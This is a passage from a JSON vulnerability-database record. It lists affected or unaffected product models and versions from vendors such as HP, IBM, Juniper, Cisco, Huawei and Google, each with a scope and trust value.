10.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.10.140.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.32" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.6" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.1.3" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "6.5" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "laserjet p3005 printer series q7814a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "2.190.3" }, { "model": "ace application control engine module ace10", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v110.1" }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "20" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "36100" }, { "model": "ive os 7.4r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.21" }, { "model": "hi switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55000" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.7" }, { "model": "laserjet enterprise m4555 mfp ce503a 2302963 436064", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "msr9xx family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "vcenter site recovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.1" }, { "model": "nsx for multi-hypervisor", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1.2" }, { "model": "laserjet printer series q7698a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9040/90508.260.3" }, { "model": "sbr enterprise", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.17" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.63" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "junos os 13.3r2-s3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "msr30 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "scale out network attached storage", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "manageone v100r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "2.0.4" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "7.0.2" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463011.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087330" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.20" }, { "model": "esight-ewl v300r001c10spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ave2000 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "color laserjet enterprise cp4525 cc493a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.164.1" }, { "model": "executive scorecard", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.40" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.22" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.2" }, { "model": "websphere datapower b2b appliance xb62", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "laserjet multifunction printer series q3726a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9040/90508.290.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.82" }, { "model": "color laserjet cp4005 printer series cb504a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "46.230.6" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "4.3.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "10.0.74.4" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "junos space 12.3p2.8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.85" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.60" }, { "model": "pulse desktop", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.0" }, { "model": "rational insight ifix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "fortios", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.8" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "laserjet m4345 multifunction printer cb425a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "8.4-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "laserjet enterprise m602 series ce991a 2302963 436082", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "600" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "malware analysis appliance", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "4.1.2" }, { "model": "usg9300 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "clearpass", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "6.1.0" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.0.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.126.0" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "anyoffice v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "color laserjet flow m680 ca251a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.4" }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "5.0.9" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.1" }, { "model": "bbm for android", "scope": "ne", "trust": 0.3, "vendor": "rim", "version": "2.2.1.40" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "virtual automation", "scope": "eq", "trust": 0.3, "vendor": "parallels", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.68" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.0" }, { "model": "color laserjet enterprise cp4025 cc490a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.34" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.50" }, { "model": "color laserjet multifunction printer series cb481a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "400046.380.3" }, { "model": "laserjet printer series q7545a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "52008.241" }, { "model": "junos 13.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "19100" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "usg9500 usg9500 v300r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "laserjet printer series q5406a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "43508.250.2" }, { "model": "espace u2990 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "forticlient build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.2.0591" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.34" }, { "model": "studio", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.60" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "laserjet enterprise mfp m525f cf116a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5000" }, { "model": "color laserjet cp3525 cc468a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "cloudplatform", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.2" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.10" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66020" }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.6" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4x27.62" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "vcd", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.3" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.4" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "one-x mobile ces for iphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "junos os 13.3r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59200" }, { "model": "security analytics platform", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "7.1.3" }, { "model": "oceanstor s6800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "manageone v100r001c02 spc901", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 11.4r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2" }, { "model": "xiv storage system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "281011.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.20" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "junos 12.1x45-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "system x3500m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "78391.42" }, { "model": "utm", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "9.2" }, { "model": "oceanstor s2600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "color laserjet cp5525 ce707a 2302963 436070", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "enterprise linux els", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3500-" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.26" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.13" }, { "model": "email and server security", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "11.00" }, { "model": "color laserjet cm6030 multifunction printer ce664a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "isoc v200r001c02spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "psb email and server security", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "9.20" }, { "model": "color laserjet cp3525 cc471a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "chrome os", "scope": "ne", "trust": 0.3, "vendor": "google", "version": "35.0.1916.155" }, { "model": "ons series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154000" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "4.3.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "clearpass", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "6.1.4" }, { "model": "webapp secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "security threat response manager", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.9.11" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.70" }, { "model": "utm", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "8.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "policy center v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087180" }, { "model": "laserjet enterprise p3015 ce526a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.50" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.14" }, { "model": "junos 12.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.4" }, { "model": "color laserjet cp6015 q3934a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "53.236.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.170" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3700-" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.92" }, { "model": "colorqube ps", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "88704.76.0" }, { "model": "web security gateway anywhere", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.1" }, { "model": "updatexpress system packs installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "5.0" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.4.1" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.21" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.3.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.85" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0" }, { "model": "color laserjet multifunction printer series cb480a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "400046.380.3" }, { "model": "vm virtualbox 4.2.0-rc3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "color laserjet cm4540 mfp cc421a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.5.2" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.50" }, { "model": "color laserjet multifunction printer series cb482a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "400046.380.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "laserjet multifunction printer series q3944a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "43459.310.2" }, { "model": "watson explorer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.3" }, { "model": "jabber video for ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.1x44-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.51" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.8" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "junos 10.4r14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1" }, { "model": "laserjet printer series q5403a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "42508.250.2" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "1.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.56" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "webex connect client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vcsa", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.343" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "color laserjet printer series q5982a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "380046.80.8" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.4" }, { "model": "junos pulse 4.0r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1.12" }, { "model": "cognos planning fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "junos -d10", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "p2 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1810v10" }, { "model": "fortiauthenticator", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.28" }, { "model": "junos space 13.1r1.6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "view client", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.3.1" }, { "model": "junos 10.0s25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 10.4r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "email and server security", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "10.00" }, { "model": "system dx360m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73251.42" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "softco v200r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.52" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.0.3" }, { "model": "color laserjet cm6040 multifunction printer q3939a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "52.256.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.28" }, { "model": "junos 10.4r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1" }, { "model": "vsphere storage appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.3" }, { "model": "laserjet p4015 cb511a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "2.0.1" }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.17" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.18" }, { "model": "junos 12.3r4-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.36" }, { "model": "agile controller v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "nip2000\u00265000 v100r002c10hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.29" }, { "model": "datafort s-series", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.4" }, { "model": "core", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9" }, { "model": "junos r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66020" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "management center", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "1.2.1.1" }, { "model": "laserjet pro m401a/d/dn/dnw/dw/n cf274a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "40020150212" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smc2.0 v100r002c01b017sp16", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.0" }, { "model": "blackberry link", 